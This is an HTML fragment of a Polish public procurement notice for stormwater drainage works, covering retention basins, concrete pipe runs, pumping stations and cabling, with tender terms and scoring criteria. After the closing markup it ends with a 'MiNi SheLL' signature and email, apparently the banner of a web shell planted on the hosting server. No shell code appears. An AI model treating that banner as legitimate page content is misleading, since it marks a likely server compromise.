id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">zgodnie z pkt. 22.2 SIWZ</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">9.00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>ZADANIE NR 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zgodnie z opisem technicznym w dokumentacji projektowej zadanie nr 1 obejmuje etapy V-VII i zasilanie pompowni ścieków.1.ETAP V- PROJEKT ROZBUDOWY ZBIORNIKA NR 4 oraz KOLEKTOR KANALIZACJI DESZCZOWEJ WZDŁUŻ ul. AMERYKAŃSKIEJ ( pkt. 7.3 Opisu Technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=26m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1000/120 L=383m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=20m wg wyliczenia: Razem kanał 2K-1 L=147m Odcinek kanału 2K-1 od studni 2S-10 do 2S-15 - roboty wykonano w innym postępowaniu L=127m dotyczy odrębnego zamówienia L=147-127=20m -Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=14m -Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 300/55 L=29m wg wyliczenia:Razem kanał 2K-3 L=54mOdcinek kanału 2K-3 od studni 2S-13do 2S-13a - roboty wykonano w innym postępowaniuL=25m dotyczy odrębnego zamówieniaL=54-25=29 mŁącznie: 26+383+20+14+29=472mStudnie kanalizacji deszczowejDN1500mm - typ centryczna -9 szt.DN1500mm- osadnikowa - 2szt.Wloty kanalizacji deszczowejDN 300mm -3 szt.DN 500mm -2 szt.DN 1000mm -1 szt.DN 1400mm -1 szt.Ogrodzenie panelowe H-1,80m zbiornik autostrada -612mDroga technologiczna o nawierzchni asfaltowej 2217m2Krawężniki drogowe 30x15x100 - 1202m-----------------------------------------------------------------------------------------2.ETAP VI- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 4 ZE ZBIORNIKIEM"AUTOSTRADA" wraz z pompownią wód deszczowych-KANALIZACJA DESZCZOWA TŁOCZNA (Rurociąg 1)-Rura Dz 280/16mm PE-100, SDR 17, PN10 L=404m-Rura PE-100 , SDR17, PN100 DZ.400/23,7 mm L=89m przewiertowaStudnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Przepompownia wód deszczowych DN3000mm z komorą zasuw i wyposażeniem - 1 kmpl.Zasilanie elektryczne przepompowni wód opadowych - KSSE Olszowa - 1 kmpl.----------------------------------------------------------------------------------------------------3.ETAP VI- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 4 ZE ZBIORNIKIEM"AUTOSTRADA" wraz z pompownią wód deszczowych-KANALIZACJA DESZCZOWA TŁOCZNA (Rurociąg 2)-Rura Dz 280/16mm PE-100, SDR 17, PN10 L=404m-Rura PE-100 , SDR17, PN100 DZ.400/23,7 mm L=89m przewiertowaStudnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Przepompownia wód deszczowych DN3000mm z komorą zasuw i wyposażeniem - 1 kmpl.----------------------------------------------------------------------------------------------------------------------------------------------4.ETAP VII- PROJEKT ZBIORNIKA RETENCYJNO - CHŁONNEGO "AUTOSTRADA"Wloty kanalizacji deszczowejDN 400mm -2 sztZbiornik chłonno retencyjny "Autostrada" F=3482 m2Ogrodzenie panelowe H-1,80m zbiornik autostrada -291mDroga technologiczna o nawierzchni asfaltowej 321 m2Krawężniki drogowe 30x15x100 - 220mUmocnienie skarp zbiornika płyty ażurowe- 1570,45 m2Warstwa separacyjna z geowłókniny Typar 37 - 1570,45 m2Filtr piaskowo - żwirowy w dnie zbiornika gr. 0,5 m - 1510.32 m2/755,16 m3Krawężniki w dnie zbiornika 20x30x100 mm - 208,40m-----------------------------------------------------------------------------------------ZASILANIE POMPOWNI ŚCIEKÓW DESZCZOWYCH I SANITARNYCH1. Ręczne kopanie rowów dla kabli, o głębokości do 1,0 m i szerokości dna wykopu do 0,6 m. - przekopy kontrolne. (szt. 15) - 30,00 m2. Ręczne zasypywanie przekopów kontrolnych j.w. - 30,00 m3. Ręczne kopanie rowów dla kabli, o głębokości do 0,8 m i szerokości dna wykopu do 0,4 m- 580,00 m4. Ręczne zasypywanie rowów dla kabli, o głębokości do 0,6 m i szerokości dna wykopu do 0,4 m - 580,00 m5. Przepusty jednootworowe o długości do 15 m z rur ochronnych z pcw o średnicy 110 mm wykonane wiertnicą ręczną - 35,00 m6. Nasypanie 2-warstw piasku na dnie rowu kablowego o szerokości do 0,4 m - 1 160,00 m7. Układanie rur ochronnych z pcw o średnicy do 110 mm w wykopie - 20,00 m8. Ręczne układanie kabli wielożyłowych o masie do 5,5 kg/m w rowach kablowych, przykrytych folią kalandrowaną - 561,00 m9. Układanie kabli wielożyłowych o masie do 5,5 kg/m w rurach, pustakach lub kanałach zamkniętych - 60,00 m10. Kabel typu YAKXS 4x240 mm2 - 621,00 m11. Obróbka na sucho kabli energetycznych wielożyłowych z żyłami aluminiowymi na napięcie do 1 kV. Zarobienie końca kabla 4-żyłowego o przekroju żył do 240 mm2 - 2,00 szt12. Przygotowanie podłoża pod złącze kablowo-pomiarowe - tylko R i S - 1,00 szt13. Montaż na gotowym podłożu złącza kablowo-pomiarowego kompletnego - 1,00 szt14. Wywóz nadmiaru ziemi samochodami samowyładowczymi na odległość do 1 km- 46,50 m315. Wywóz nadmiaru ziemi samochodami samowyładowczymi na każdy następny 1 km do 5 km - 46,50 m316. Linie kablowe do 1 kV 4-żyłowe - pomiar - 1,00 odcinek17. Złącze kablowo-pomiarowe - pomiar - 1,00 szt18. Obsługa geodezyjna, nadzory branżowe, dopuszczenia RE i wyłączenia, inne -1,00 kpl-------------------------------------------------------------------------------------------------------------------------------UWAGA!!!1. (Wyjaśnienie do pkt 5.2.5 Opisu Technicznego) Niniejszy projekt zakłada wybudowanie jednej pompowni ścieków z dwiema pompami z pełnym wyposażeniem (stopy sprzęgające piony tłoczne itd.) oraz jednej pompowni bez wyposażenia. Komory zasuw i studnie na obydwóch rurociągach tłocznych są w pełni uzbrojone w projektowaną armaturę.2. Zakres robót nie obejmuje kanału 2K-1 od studni 2S-10 do 2S-15 oraz kanału 2K-3 - ten odcinek kanalizacji został wykonany podczas realizacji innego postępowania, studnia 2S-10 została wykonana i zaślepiona, przy realizacji przedmiotowej inwestycji należy się do niej podłączyć.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45230000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-08-03<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>ZADANIE NR 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zgodnie z opisem technicznym w dokumentacji projektowej zadanie nr 2 obejmuje etapy I-IV.1.ETAP IV- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK "RONDO" ze ZBIORNIKIEM NR 4 -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką klinową Dz1400/160 L=86m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=100m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1000/120 L=76m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 900/110 L=85m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 700/80 L=69m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 600/75 L=115mRazem: 86+100+76+85+69+115=531mStudnie kanalizacji deszczowejDN2000mm - typ centryczna -4 szt.DN1000mm- typ styczna -7 szt.DN1200mm- typ centryczna -2 szt.--------------------------------------------------------------------------------2. ETAP I - PROJEKT: ROZBUDOWA ZBIORNIKA NR 3 (ZAKRES PRAC ZWIĄZANYCH Z ROZBUDOWĄ ZBIORNIKA pkt. 7.1 opisu technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=55m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=21m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 400/55 L=6mRazem: 82mStudnie kanalizacji deszczowejDN2000mm - typ centryczna -2 szt.DN1000mm- typ styczna -5 szt.Studnia osadnikowa DN1500 mm - 1 szt.Wylot kanalizacji deszczowejDN 400mm - 2 szt.DN 500mm - 1 szt.DN 1200mm - 1 szt.Zasuwa wrzecionowa - 1 szt.Separator koalescencyjny zintegrowany z osadnikiem i bypassem 15/150 Dz 1800 - 1 kmpl.Zbiornik chłonno retencyjny nr 3 F=3810 m2Umocnienie skarp zbiornika płyty ażurowe- 2128,77m2Warstwa separacyjna z geowłókniny Typar 37 - 2178,77 m2Filtr piaskowo - żwirowy w dnie zbiornika gr. 0,5 m - 1762,06 m2/881,03 m3Krawężniki w dnie zbiornika 2x30x100 mm - 253,82mOgrodzenie panelowe H-1,80m zbiornik autostrada -326mSchody skarpowe L= 8,4mDroga technologiczna o nawierzchni asfaltowej 494,35 m2Krawężniki drogowe 30x15x100 - 308 m-----------------------------------------------------------------------------------------------------------------------3.ETAP II- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 3 ZE ZBIORNIKIEM "RONDO" -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=48m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=46m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 600/75 L=150m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 400/55 L=368mRazem:612 mStudnie:Studnia DN 2000 mm- 3 szt.Studnia DN 1200 mm -1szt.Studnia DN1500 mm - 2szt.Studnia DN 1000 mm - 12 szt.Studnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Odtworzenie nawierzchni bitumicznej 90 m2------------------------------------------------------------------------4.ETAP III- PROJEKT ROZBUDOWY ZBIORNIKA "RONDO" ( pkt. 7.2 Opisu Technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=44m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=4m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 300/55 L=15m-Rura PCV-U (lite) klasy S, SN8 200/5,9mm,-przebudowa istniejącej Ksdługość fabryczna L=6m z kielichem i uszczelką L=16mRazem: L=44+4+15+16=79m----------------------------------------------------------------------------------------------------------------------------------------------UWAGA!!!1. Wykonawca realizując zadanie nr 2 zobowiązany jest zachować szczególną ostrożność przy wykonywaniu robót na działkach nr 3/12 i 3/13 (własność firmy IFA - Gmina posiada prawo do dysponowania nieruchomością na cele budowlane) z uwagi na obecne zagospodarowanie terenu (istniejące ogrodzenie, skarpa i parking), co Wykonawca powinien wziąć pod uwagę przy kalkulacji ceny oferty. Po wykonanych robotach teren ten będzie należało przywrócić do stanu pierwotnego. Dlatego też konieczne jest przeprowadzenie wizji lokalnej w terenie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45230000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-08-03<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com